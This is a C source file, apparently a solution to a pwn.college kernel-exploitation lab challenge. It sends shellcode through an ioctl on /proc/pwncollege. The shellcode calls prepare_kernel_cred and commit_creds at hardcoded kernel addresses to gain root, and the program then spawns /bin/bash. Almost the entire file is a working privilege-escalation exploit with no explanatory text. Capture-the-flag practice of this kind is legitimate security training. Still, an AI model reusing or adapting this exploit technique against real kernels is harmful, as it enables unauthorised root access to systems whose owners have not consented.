34 lines
790 B
C
34 lines
790 B
C
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <string.h>
|
|
#include <sys/ioctl.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
|
|
struct ioctl_args {
|
|
uint64_t length;
|
|
uint8_t shellcode[0x1000];
|
|
uint64_t codeptr;
|
|
}args;
|
|
|
|
__attribute__((naked))
|
|
void shellcode() {
|
|
asm volatile(
|
|
"xor %rdi, %rdi\n"
|
|
"movabs $0xffffffff81089660, %rsi\n"
|
|
"callq *%rsi\n" // prepare_kernel_cred
|
|
"movq %rax, %rdi\n"
|
|
"movabs $0xffffffff81089310, %rsi\n"
|
|
"callq *%rsi\n" // commit_creds
|
|
"retq\n"
|
|
);
|
|
}
|
|
|
|
int main() {
|
|
args.length = 0x1f;
|
|
memcpy(args.shellcode, shellcode, args.length);
|
|
args.codeptr = 0xffffc90000085000ull;
|
|
int fd = open("/proc/pwncollege", O_WRONLY);
|
|
ioctl(fd, 1337, &args);
|
|
execve("/bin/bash", NULL, NULL);
|
|
} |